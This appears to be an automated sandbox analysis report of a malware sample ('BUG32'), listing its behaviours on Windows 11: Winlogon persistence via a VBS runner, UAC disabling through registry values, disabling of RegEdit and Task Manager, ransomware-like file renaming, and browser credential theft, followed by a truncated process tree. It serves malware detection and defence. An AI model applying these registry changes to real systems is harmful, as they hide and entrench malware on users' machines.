83d07e68ea4d6d5a4cc9c927100d0e036e8bc3a7fa592a2bc720864e00e2609a

Analysis

max time kernel
94s
max time network
131s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
13-10-2024 10:20

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

241013-j4ss6a1bnn_pw_infected.zip
Size

4KB
MD5

354f077f8f8d1ec1f9f6996408dde5dd
SHA1

11ab6eda31020745f43beabe581d67ea9c7c6823
SHA256

83d07e68ea4d6d5a4cc9c927100d0e036e8bc3a7fa592a2bc720864e00e2609a
SHA512

ecb1a47892b6367317480aac404077564315561bdd0d3dcd4a5924b337091bbe79718bfc88313b14b47f02ab60dcc511e9f0f884ee83202241e88248fe599ae4
SSDEEP

48:9NXn0ZYSdXNvF5QYkuS7J3Xw7UkUjzm/nobYaIiQvVN21nSgw8CIWbIOSQUWizAL:PkZY8XH5QYTSJXw4i/33v3ajwf2h8PD

Score

10^/10

defense_evasion discovery evasion persistence privilege_escalation ransomware spyware stealer trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

wscript.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\bug32\\runner.vbs\""	wscript.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

wscript.exewscript.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Renames multiple (187) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

wscript.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools = "1"	wscript.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

BUG32 (1).exe

pid process

3512 BUG32 (1).exe

pid	process
3512	BUG32 (1).exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico"	wscript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 19 IoCs

Processes:

wmplayer.exewscript.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	wmplayer.exe
File created	C:\Users\Admin\Links\desktop.ini	wscript.exe
File created	C:\Users\Admin\OneDrive\desktop.ini	wscript.exe
File created	C:\Users\Admin\Saved Games\desktop.ini	wscript.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	wmplayer.exe
File created	C:\Users\Admin\Documents\desktop.ini	wscript.exe
File created	C:\Users\Admin\Downloads\desktop.ini	wscript.exe
File created	C:\Users\Admin\Searches\desktop.ini	wscript.exe
File created	C:\Users\Admin\Videos\desktop.ini	wscript.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	wmplayer.exe
File created	C:\Users\Admin\Contacts\desktop.ini	wscript.exe
File created	C:\Users\Admin\Desktop\desktop.ini	wscript.exe
File created	C:\Users\Admin\Pictures\desktop.ini	wscript.exe
File opened for modification	C:\Users\Public\desktop.ini	wmplayer.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	wmplayer.exe
File created	C:\Users\Admin\Favorites\desktop.ini	wscript.exe
File created	C:\Users\Admin\Music\desktop.ini	wscript.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

unregmp2.exewmplayer.exe

description	ioc	process
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\E:	wmplayer.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\N:	wmplayer.exe
File opened (read-only)	\??\P:	wmplayer.exe
File opened (read-only)	\??\S:	wmplayer.exe
File opened (read-only)	\??\M:	wmplayer.exe
File opened (read-only)	\??\O:	wmplayer.exe
File opened (read-only)	\??\R:	wmplayer.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\K:	wmplayer.exe
File opened (read-only)	\??\Q:	wmplayer.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\U:	wmplayer.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\Y:	wmplayer.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\G:	wmplayer.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\L:	wmplayer.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\M:	unregmp2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

52 raw.githubusercontent.com
12 raw.githubusercontent.com
41 camo.githubusercontent.com
42 camo.githubusercontent.com

flow	ioc
52	raw.githubusercontent.com
12	raw.githubusercontent.com
41	camo.githubusercontent.com
42	camo.githubusercontent.com

Drops file in Windows directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
defense_evasion

SIP and Trust Provider Hijacking
T1553.003

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\BUG32 (1).exe:Zone.Identifier msedge.exe
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
defense_evasion privilege_escalation

Create Process with Token
T1134.002

Processes:

wscript.exe

pid process

4972 wscript.exe
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1528 4836 WerFault.exe wmplayer.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\BUG32 (1).exe:Zone.Identifier	msedge.exe

pid	process
4972	wscript.exe

pid	pid_target	process	target process
1528	4836	WerFault.exe	wmplayer.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

BUG32 (1).exewmplayer.exeunregmp2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BUG32 (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmplayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unregmp2.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

cmd.exe

pid process

2300 cmd.exe
2152
2428
1068

pid	process
2300	cmd.exe
2152
2428
1068

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Control Panel 4 IoCs

evasion

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Arrow = "C:\\bug32\\bx.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\AppStarting = "C:\\bug32\\bx.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Control Panel\Cursors\Hand = "C:\\bug32\\bx.cur"	wscript.exe

Modifies registry class 2 IoCs

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico"	wscript.exe

NTFS ADS 3 IoCs

Processes:

msedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 186321.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 190649.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\BUG32 (1).exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exe

pid	process
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
3796	msedge.exe
3796	msedge.exe
2108	identity_helper.exe
2108	identity_helper.exe
1072	msedge.exe
1072	msedge.exe
3556	msedge.exe
3556	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

wscript.exewmplayer.exe

pid process

4972 wscript.exe
4836 wmplayer.exe

pid	process
4972	wscript.exe
4836	wmplayer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

Processes:

msedge.exe

pid	process
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

7zFM.exewmplayer.exeunregmp2.exe

description	pid	process
Token: SeRestorePrivilege	1472	7zFM.exe
Token: 35	1472	7zFM.exe
Token: SeShutdownPrivilege	4836	wmplayer.exe
Token: SeCreatePagefilePrivilege	4836	wmplayer.exe
Token: SeShutdownPrivilege	3880	unregmp2.exe
Token: SeCreatePagefilePrivilege	3880	unregmp2.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

7zFM.exemsedge.exe

pid	process
1472	7zFM.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe

Suspicious use of SendNotifyMessage 14 IoCs

Processes:

msedge.exe

pid	process
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe
4756	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4756 wrote to memory of 3876	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 3876	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2712	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 3796	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 3796	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe
PID 4756 wrote to memory of 2616	4756	msedge.exe	msedge.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

wscript.exewscript.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

pid process

1092

pid	process
1092

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241013-j4ss6a1bnn_pw_infected.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb9773cb8,0x7ffcb9773cc8,0x7ffcb9773cd8
  2⤵
  PID:3876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1852 /prefetch:2
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2572 /prefetch:8
  2⤵
  PID:2616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4484 /prefetch:1
  2⤵
  PID:240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
  2⤵
  PID:1348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1
  2⤵
  PID:1112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:3412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:4740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:4568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:1516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1848,4215868632100479166,4135930727259212298,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6192 /prefetch:8
  2⤵
  PID:3556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
